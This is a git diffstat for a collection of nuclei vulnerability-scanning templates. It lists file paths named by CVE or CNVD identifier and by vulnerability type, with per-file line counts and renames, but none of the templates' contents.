nuclei-templates/CVE-2022/cve-2022-29455.yaml | 56 - nuclei-templates/CVE-2022/cve-2022-29464.yaml | 48 - nuclei-templates/CVE-2022/cve-2022-30776.yaml | 20 +- nuclei-templates/CVE-2022/cve-2022-30777.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-31268.yaml | 58 + nuclei-templates/CVE-2022/cve-2022-31793.yaml | 47 + ...VE-2022-32007.yaml => cve-2022-32007.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-32022.yaml | 21 +- ...VE-2022-32025.yaml => cve-2022-32025.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-32026.yaml | 54 - nuclei-templates/CVE-2022/cve-2022-32409.yaml | 48 + nuclei-templates/CVE-2022/cve-2022-32444.yaml | 20 +- nuclei-templates/CVE-2022/cve-2022-33174.yaml | 25 +- ...VE-2022-34047.yaml => cve-2022-34047.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-34049.yaml | 17 +- ...VE-2022-35416.yaml => cve-2022-35416.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-36883.yaml | 38 - nuclei-templates/CVE-2022/cve-2022-42889.yaml | 4 +- nuclei-templates/CVE-2023/CVE-2023-0099.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-0126.yaml | 13 +- 
nuclei-templates/CVE-2023/CVE-2023-0236.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-0261.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-0297.yaml | 61 + nuclei-templates/CVE-2023/CVE-2023-0334.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0448.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-0514.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0527.yaml | 27 +- nuclei-templates/CVE-2023/CVE-2023-0552.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0562.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-0563.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-0585.yaml | 60 +- nuclei-templates/CVE-2023/CVE-2023-0600.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-0602.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0630.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-0669.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-0777.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-0900.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0942.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-0947.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0948.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0968.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-1020.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1080.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-1177.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-1263.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1362.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-1408.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1434.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-1454.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-1496.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-1546.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1671.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-1698.yaml | 28 +- nuclei-templates/CVE-2023/CVE-2023-1719.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-1730.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-1780.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-1835.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1880.yaml | 8 +- 
nuclei-templates/CVE-2023/CVE-2023-1890.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-20073.yaml | 48 +- nuclei-templates/CVE-2023/CVE-2023-2009.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-20198.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-2023.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-20864.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-20887.yaml | 32 +- nuclei-templates/CVE-2023/CVE-2023-20888.yaml | 21 +- nuclei-templates/CVE-2023/CVE-2023-20889.yaml | 33 +- nuclei-templates/CVE-2023/CVE-2023-2122.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-2130.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-2178.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-2224.yaml | 46 +- nuclei-templates/CVE-2023/CVE-2023-22432.yaml | 19 +- nuclei-templates/CVE-2023/CVE-2023-22463.yaml | 19 +- nuclei-templates/CVE-2023/CVE-2023-22478.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-22480.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-22515.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-22518.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-2252.yaml | 19 +- nuclei-templates/CVE-2023/CVE-2023-22620.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-2272.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-22897.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-23161.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-23333.yaml | 60 + nuclei-templates/CVE-2023/CVE-2023-23488.yaml | 15 +- nuclei-templates/CVE-2023/CVE-2023-23489.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-23491.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-23492.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-2356.yaml | 12 +- ...ve-2023-23752.yaml => CVE-2023-23752.yaml} | 0 nuclei-templates/CVE-2023/CVE-2023-24044.yaml | 26 +- nuclei-templates/CVE-2023/CVE-2023-24243.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-24278.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-24322.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-24367.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-24488.yaml | 68 +- 
nuclei-templates/CVE-2023/CVE-2023-24489.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-24657.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-24733.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-24735.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-24737.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-2479.yaml | 76 +- nuclei-templates/CVE-2023/CVE-2023-25135.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-25157.yaml | 26 +- nuclei-templates/CVE-2023/CVE-2023-25194.yaml | 99 - nuclei-templates/CVE-2023/CVE-2023-25346.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-25573.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-25717.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-26067.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-26255.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-26256.yaml | 52 + nuclei-templates/CVE-2023/CVE-2023-26347.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-26360.yaml | 26 +- nuclei-templates/CVE-2023/CVE-2023-2640.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-26469.yaml | 24 +- nuclei-templates/CVE-2023/CVE-2023-2648.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-26842.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-26843.yaml | 18 +- nuclei-templates/CVE-2023/CVE-2023-27008.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-27034.yaml | 41 +- nuclei-templates/CVE-2023/CVE-2023-27159.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27179.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27292.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-2732.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27350.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-27372.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27482.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27524.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27587.yaml | 55 +- nuclei-templates/CVE-2023/CVE-2023-2766.yaml | 24 +- nuclei-templates/CVE-2023/CVE-2023-2779.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-2780.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27922.yaml | 6 +- 
nuclei-templates/CVE-2023/CVE-2023-2796.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-28121.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-2813.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-2822.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-2825.yaml | 213 + nuclei-templates/CVE-2023/CVE-2023-28343.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-28432.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-28665.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29084.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-29298.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-29300.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-29357.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29439.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-29489.yaml | 55 +- nuclei-templates/CVE-2023/CVE-2023-29622.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29623.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-2982.yaml | 18 +- nuclei-templates/CVE-2023/CVE-2023-29887.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29919.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-29922.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29923.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-30013.yaml | 25 +- nuclei-templates/CVE-2023/CVE-2023-30019.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-30150.yaml | 50 +- nuclei-templates/CVE-2023/CVE-2023-30210.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-30212.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-30256.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-30258.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-30534.yaml | 34 +- nuclei-templates/CVE-2023/CVE-2023-30625.yaml | 27 +- nuclei-templates/CVE-2023/CVE-2023-30777.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-30868.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-30943.yaml | 56 +- nuclei-templates/CVE-2023/CVE-2023-31059.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-31465.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-31548.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-32117.yaml | 8 +- 
nuclei-templates/CVE-2023/CVE-2023-3219.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-32235.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-32243.yaml | 89 +- nuclei-templates/CVE-2023/CVE-2023-32315.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-32563.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-33338.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-33405.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-33439.yaml | 32 +- nuclei-templates/CVE-2023/CVE-2023-33440.yaml | 78 +- nuclei-templates/CVE-2023/CVE-2023-3345.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-33510.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-33568.yaml | 22 +- nuclei-templates/CVE-2023/CVE-2023-33584.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-33629.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-33831.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-34020.yaml | 30 +- nuclei-templates/CVE-2023/CVE-2023-34124.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-34192.yaml | 28 +- nuclei-templates/CVE-2023/CVE-2023-34259.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-34362.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-34537.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-34598.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-34599.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3460.yaml | 110 +- nuclei-templates/CVE-2023/CVE-2023-34659.yaml | 19 +- nuclei-templates/CVE-2023/CVE-2023-34751.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-34752.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-34753.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-34755.yaml | 4 +- nuclei-templates/CVE-2023/CVE-2023-34756.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-3479.yaml | 42 +- nuclei-templates/CVE-2023/CVE-2023-34843.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-34960.yaml | 69 +- nuclei-templates/CVE-2023/CVE-2023-35078.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-35082.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3519.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-35813.yaml | 9 +- 
nuclei-templates/CVE-2023/CVE-2023-35843.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-35844.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-35885.yaml | 23 +- nuclei-templates/CVE-2023/CVE-2023-36287.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-36289.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-36306.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-36346.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-36844.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-36845.yaml | 17 +- nuclei-templates/CVE-2023/CVE-2023-36934.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-3710.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37265.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-37266.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37270.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37462.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37474.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-37580.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37629.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-3765.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37679.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-37728.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-37979.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-38035.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-38205.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-3843.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-38433.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-3844.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3845.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3846.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3847.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-3848.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-3849.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-38501.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-38646.yaml | 74 +- nuclei-templates/CVE-2023/CVE-2023-38992.yaml | 51 + nuclei-templates/CVE-2023/CVE-2023-39026.yaml | 48 +- nuclei-templates/CVE-2023/CVE-2023-39108.yaml | 8 +- 
nuclei-templates/CVE-2023/CVE-2023-39109.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-39110.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-39120.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-39141.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-39143.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-3936.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-39361.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-39598.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-39600.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-39676.yaml | 22 +- nuclei-templates/CVE-2023/CVE-2023-39677.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-39700.yaml | 4 +- nuclei-templates/CVE-2023/CVE-2023-39796.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-40208.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-40779.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4110.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4111.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4112.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4113.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4114.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4115.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4116.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-41265.yaml | 59 +- nuclei-templates/CVE-2023/CVE-2023-41266.yaml | 48 +- nuclei-templates/CVE-2023/CVE-2023-4148.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-41538.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-41642.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-4168.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4169.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-4173.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-4174.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-41892.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-42442.yaml | 20 +- nuclei-templates/CVE-2023/CVE-2023-42793.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-43261.yaml | 23 +- nuclei-templates/CVE-2023/CVE-2023-43325.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-43326.yaml | 7 +- 
nuclei-templates/CVE-2023/CVE-2023-43795.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-4415.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-4451.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-4547.yaml | 4 +- nuclei-templates/CVE-2023/CVE-2023-45542.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-4568.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-45852.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-4596.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-4634.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-46604.yaml | 56 +- nuclei-templates/CVE-2023/CVE-2023-46747.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-4714.yaml | 22 +- nuclei-templates/CVE-2023/CVE-2023-47246.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-47684.yaml | 64 +- nuclei-templates/CVE-2023/CVE-2023-49103.yaml | 46 +- nuclei-templates/CVE-2023/CVE-2023-4911.yaml | 15 +- nuclei-templates/CVE-2023/CVE-2023-4966.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-4974.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-5074.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-51467.yaml | 47 - nuclei-templates/CVE-2023/CVE-2023-5244.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-5360.yaml | 25 +- nuclei-templates/CVE-2023/CVE-2023-5375.yaml | 7 +- nuclei-templates/CVE-2023/cve-2023-33246.yaml | 15 +- nuclei-templates/CVE-2024/CVE-2024-1021.yaml | 11 +- nuclei-templates/CVE-2024/CVE-2024-1183.yaml | 36 + nuclei-templates/CVE-2024/CVE-2024-1207.yaml | 77 +- .../CVE-2024-1561.yaml} | 0 .../CVE-2024-1728.yaml} | 0 nuclei-templates/CVE-2024/CVE-2024-22320.yaml | 40 +- nuclei-templates/CVE-2024/CVE-2024-23167.yaml | 77 + nuclei-templates/CVE-2024/CVE-2024-29059.yaml | 87 +- nuclei-templates/CVE-2024/CVE-2024-34102.yaml | 48 +- nuclei-templates/CVE-2024/CVE-2024-36401.yaml | 44 +- nuclei-templates/CVE-2024/CVE-2024-3673.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-37084.yaml | 44 + nuclei-templates/CVE-2024/CVE-2024-3899.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-41667.yaml | 244 + 
nuclei-templates/CVE-2024/CVE-2024-4358.yaml | 10 +- nuclei-templates/CVE-2024/CVE-2024-45269.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-45270.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-45429.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-45625.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5561.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5567.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5628.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5789.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5867.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5869.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5870.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5884.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6020.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6088.yaml | 24 - nuclei-templates/CVE-2024/CVE-2024-6544.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6792.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6888.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6889.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6910.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7132.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7354.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7423.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7716.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7888.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7891.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7955.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8031.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8242.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8269.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8522.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8529.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8622.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8656.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8663.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8664.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8665.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8714.yaml | 59 + 
nuclei-templates/CVE-2024/CVE-2024-8730.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8731.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8732.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8734.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8737.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8742.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8747.yaml | 59 + nuclei-templates/Other/0xlfi2.yaml | 39 - nuclei-templates/Other/0xlfifuzz1.yaml | 40 - .../Other/3com-nj2000-default-login.yaml | 5 +- .../Other/3cx-management-console-2.yaml | 43 + .../Other/3cx-management-console.yaml | 41 - .../Other/3cx-phone-management-panel.yaml | 15 +- .../3cx-phone-webclient-management-panel.yaml | 17 +- nuclei-templates/Other/3cx.yaml | 20 + .../Other/3dprint-arbitrary-file-upload.yaml | 23 +- .../Other/3g-wireless-gateway-3.yaml | 57 +- ...-fileRead.yaml => 3gmeeting-fileread.yaml} | 0 nuclei-templates/Other/403-bypass_method.yaml | 28 - .../Other/403-bypass_xheaders.yaml | 52 - .../Other/403-bypass_xrewriteurl.yaml | 33 - nuclei-templates/Other/403-finder.yaml | 7 +- nuclei-templates/Other/404-to-301-xss.yaml | 14 +- .../{74cms-sqli-9.yaml => 74cms-sqli-10.yaml} | 0 nuclei-templates/Other/74cms-sqli-8.yaml | 32 + nuclei-templates/Other/ApacheSolr-SSRF-1.yaml | 21 + nuclei-templates/Other/ApacheSolr-SSRF-2.yaml | 21 + nuclei-templates/Other/ApacheSolr-SSRF-3.yaml | 20 + nuclei-templates/Other/ApacheSolr-SSRF-4.yaml | 20 + nuclei-templates/Other/ApacheSolr-SSRF-5.yaml | 21 + nuclei-templates/Other/ApacheSolr-SSRF-6.yaml | 21 + nuclei-templates/Other/ApacheStruts-RCE.yaml | 20 + nuclei-templates/Other/CNNVD-200705-315.yaml | 26 + nuclei-templates/Other/CNVD-2017-03561.yaml | 21 +- ...9-01348-1040.yaml => CNVD-2019-01348.yaml} | 0 nuclei-templates/Other/CNVD-2019-17294.yaml | 5 - nuclei-templates/Other/CNVD-2019-19299.yaml | 43 + nuclei-templates/Other/CNVD-2020-23735.yaml | 24 + nuclei-templates/Other/CNVD-2020-26585.yaml | 24 +- nuclei-templates/Other/CNVD-2020-46552.yaml | 34 - 
nuclei-templates/Other/CNVD-2020-63964.yaml | 5 +- nuclei-templates/Other/CNVD-2020-67113.yaml | 38 - nuclei-templates/Other/CNVD-2020-68596.yaml | 44 - nuclei-templates/Other/CNVD-2021-01627.yaml | 5 - nuclei-templates/Other/CNVD-2021-01931.yaml | 25 + nuclei-templates/Other/CNVD-2021-10543.yaml | 21 + nuclei-templates/Other/CNVD-2021-14536.yaml | 45 - nuclei-templates/Other/CNVD-2021-15822.yaml | 27 - nuclei-templates/Other/CNVD-2021-15824.yaml | 32 + nuclei-templates/Other/CNVD-2021-17369.yaml | 24 - nuclei-templates/Other/CNVD-2021-30167-1.yaml | 37 + nuclei-templates/Other/CNVD-2021-30167-2.yaml | 37 + nuclei-templates/Other/CNVD-2021-32799.yaml | 7 +- nuclei-templates/Other/CNVD-2021-33202.yaml | 8 +- nuclei-templates/Other/CNVD-2021-41972.yaml | 5 +- nuclei-templates/Other/CNVD-2021-43984.yaml | 5 +- nuclei-templates/Other/CNVD-2021-49104.yaml | 43 + nuclei-templates/Other/CNVD-2022-42853.yaml | 8 +- nuclei-templates/Other/CNVD-2022-43245.yaml | 10 +- nuclei-templates/Other/CNVD-2022-86535.yaml | 82 +- nuclei-templates/Other/CNVD-2023-08743.yaml | 5 +- nuclei-templates/Other/CNVD-C-2023-76801.yaml | 23 +- nuclei-templates/Other/CRMEB-sqli.yaml | 2 - nuclei-templates/Other/CVE_2023_51467.yaml | 51 + nuclei-templates/Other/Confluence-SSRF.yaml | 18 + .../Other/{dse855.yaml => DSE855.yaml} | 0 ..._Sqli.yaml => Dahua_Video_FileUpload.yaml} | 0 .../Other/Devias-kit-register.yaml | 50 +- ...ord-sqli.yaml => DocCMS-keyword-sqli.yaml} | 0 nuclei-templates/Other/Dotnetcms-SQLi.yaml | 29 - nuclei-templates/Other/Dynatrace-token.yaml | 13 + ...ist-sqli.yaml => EmpireCMS-list-sqli.yaml} | 0 nuclei-templates/Other/Facebook-secret.yaml | 4 +- .../Other/GLPI-9.3.3-SQL-Injection.yaml | 25 - nuclei-templates/Other/GT-AC2900-login.yaml | 26 - .../{google-api-7772.yaml => Google-api.yaml} | 0 nuclei-templates/Other/Grafana-file-read.yaml | 33 - nuclei-templates/Other/Header-Injection.yaml | 4 - ...ikvision_iVMS-8700_Fileupload_report.yaml} | 0 
nuclei-templates/Other/JBoss-SSRF.yaml | 21 + .../Other/JeeSite-default-login.yaml | 25 + nuclei-templates/Other/Jenkins-RCE.yaml | 21 + .../{kingdee-sqli.yaml => Kingdee-sqli.yaml} | 0 ...gsoft-upload.yaml => Kingsoft-upload.yaml} | 0 .../Landray OA treexml.tmpl Script RCE.yaml | 41 +- ...agicflow-sqli.yaml => MagicFlow-sqli.yaml} | 0 nuclei-templates/Other/Mailchimp-api.yaml | 16 - nuclei-templates/Other/Mailgun-api.yaml | 13 + .../Other/Mantis-Default_login.yaml | 46 - .../Other/NETSurveillance-fileRead.yaml | 3 - nuclei-templates/Other/OpenTSDB-RCE-1.yaml | 21 + nuclei-templates/Other/OpenTSDB-RCE-2.yaml | 21 + nuclei-templates/Other/Oracle-OAM-XSS.yaml | 28 - nuclei-templates/Other/PeopleSoft-XXE-1.yaml | 24 + nuclei-templates/Other/PeopleSoft-XXE-2.yaml | 24 + .../Other/RCE-CVE-2021-41773.yaml | 18 - nuclei-templates/Other/RedMine-Detect.yaml | 54 - .../Other/Redmine-Default-Login.yaml | 21 + ...fileupload.yaml => Ruijie_EXCU_SHELL.yaml} | 0 